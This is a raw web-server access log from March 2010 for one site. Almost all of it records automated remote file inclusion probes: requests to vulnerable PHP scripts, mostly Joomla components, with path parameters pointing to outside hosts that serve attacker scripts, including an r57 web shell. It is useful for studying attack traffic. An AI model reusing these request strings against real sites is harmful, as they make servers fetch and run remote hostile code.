216.119.103.16 - - [01/Mar/2010:07:19:58 -0800] "GET /logs/access_100211.log//components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:20:12 -0800] "GET /logs/access_100211.log%20%20//components/com_content/content.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:20:30 -0800] "GET /logs/access_100127.log/bad_link.php?theme_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:20:30 -0800] "GET /logs/bad_link.php?theme_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:20:30 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:07:20:31 -0800] "GET /logs/access_100220.log%20%20//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:07:21:07 -0800] "GET /logs/access_100204.log%20%20//install.serverstat.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:23:55 -0800] "GET /logs/access_100208.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:23:55 -0800] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:23:55 -0800] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:24:00 -0800] "GET /logs/access_100119.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:25:17 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:25:17 -0800] "GET /become_editor.php?theme_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:25:17 -0800] "GET /logs/become_editor.php?theme_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:25:28 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:27:04 -0800] "GET /logs/access_100208.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:27:17 -0800] "GET /logs/access_100119.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.2.23 - - [01/Mar/2010:07:27:34 -0800] "GET /logs/access_100123.log//newspublish/include.php?path%5Bdocroot%5D=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:29:09 -0800] "GET /logs/access_100207.log//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:29:09 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:29:23 -0800] "GET /logs/access_100224.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:32:22 -0800] "GET /components/com_sef/sef.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:32:22 -0800] "GET /logs//components/com_sef/sef.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:07:32:22 -0800] "GET /logs/access_100224.log//components/com_sef/sef.php?mosConfig.absolute.path=http://region2000.org///images/AinuLid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:07:35:21 -0800] "GET /logs/access_100215.log%20//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:07:35:40 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:07:35:40 -0800] "GET /logs/access_100120.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:07:35:40 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:07:36:29 -0800] "GET /logs/access_100120.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:07:36:29 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:07:36:29 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:07:36:50 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:07:36:50 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:07:36:51 -0800] "GET /logs/access_100121.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:07:37:00 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:07:37:00 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:07:37:33 -0800] "GET /logs/access_100201.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:07:37:47 -0800] "GET /logs/access_100201.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:07:38:01 -0800] "GET /logs///nullpo/hsList.php?subdir=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:07:38:19 -0800] "GET /logs/access_100214.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:07:38:19 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:07:38:19 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:07:39:09 -0800] "GET /logs/access_100211.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:07:39:09 -0800] "GET /logs/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:07:39:09 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:07:39:10 -0800] "GET /logs/access_100120.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:39:27 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:39:28 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:39:33 -0800] "GET /logs/access_100130.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:39:33 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:39:34 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:40:00 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:40:00 -0800] "GET /logs/access_100130.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:40:00 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.200.145.254 - - [01/Mar/2010:07:40:31 -0800] "GET /http://mc-crew.org/file/r57.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.832" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:40:46 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:40:46 -0800] "GET /logs/access_100120.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:40:46 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:07:41:01 -0800] "GET /logs/access_100210.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:07:41:43 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:07:41:44 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:07:41:44 -0800] "GET /logs/access_100121.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:42:08 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:42:09 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:07:42:14 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:07:42:32 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:07:42:32 -0800] "GET /logs/access_100204.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:07:42:32 -0800] "GET /logs/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:07:42:49 -0800] "GET /logs/access_100217.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.mosdj.com/images/large/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:07:42:49 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.mosdj.com/images/large/iid1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:07:42:49 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.mosdj.com/images/large/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:07:42:51 -0800] "GET /logs/access_100127.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:07:43:04 -0800] "GET /logs/access_100205.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://www.mosdj.com/images/large/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:07:43:10 -0800] "GET /logs/access_100201.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:07:43:39 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.mosdj.com/images/large/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:07:43:39 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.mosdj.com/images/large/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:07:43:39 -0800] "GET /logs/access_100217.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.mosdj.com/images/large/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:07:43:40 -0800] "GET /logs/access_100127.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:07:43:45 -0800] "GET /logs/access_100205.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.mosdj.com/images/large/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:44:31 -0800] "GET /logs/access_100120.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:07:44:53 -0800] "GET /logs/access_100120.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:07:45:48 -0800] "GET /logs/access_100130.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:07:45:49 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:07:45:49 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:45:50 -0800] "GET /logs/access_100210.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:07:46:08 -0800] "GET /logs/access_100210.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.59.49 - - [01/Mar/2010:07:47:05 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
174.129.59.49 - - [01/Mar/2010:07:47:06 -0800] "GET /orange_g/forum/index.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
212.92.23.144 - - [01/Mar/2010:07:47:27 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:47:27 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:47:27 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:07:47:52 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:07:47:52 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:07:47:52 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:47:55 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.77.101.13 - - [01/Mar/2010:07:48:06 -0800] "GET /logs/access_100209.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.77.101.13 - - [01/Mar/2010:07:48:06 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.77.101.13 - - [01/Mar/2010:07:48:07 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:07:48:22 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:07:48:22 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:07:48:22 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
118.217.5.166 - - [01/Mar/2010:07:48:58 -0800] "GET /logs/access_100215.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [01/Mar/2010:07:48:58 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [01/Mar/2010:07:48:58 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.77.101.13 - - [01/Mar/2010:07:49:33 -0800] "GET /logs/access_100217.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lesbiansexstory.tv/free-sex-videos/wp-content/byz9991.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:07:49:49 -0800] "GET /appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:07:49:49 -0800] "GET /logs/access_100220.log/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:07:49:49 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:07:49:55 -0800] "GET /logs/access_100126.log/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:07:50:19 -0800] "GET /logs/access_100125.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:07:50:23 -0800] "GET /logs/access_100125.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
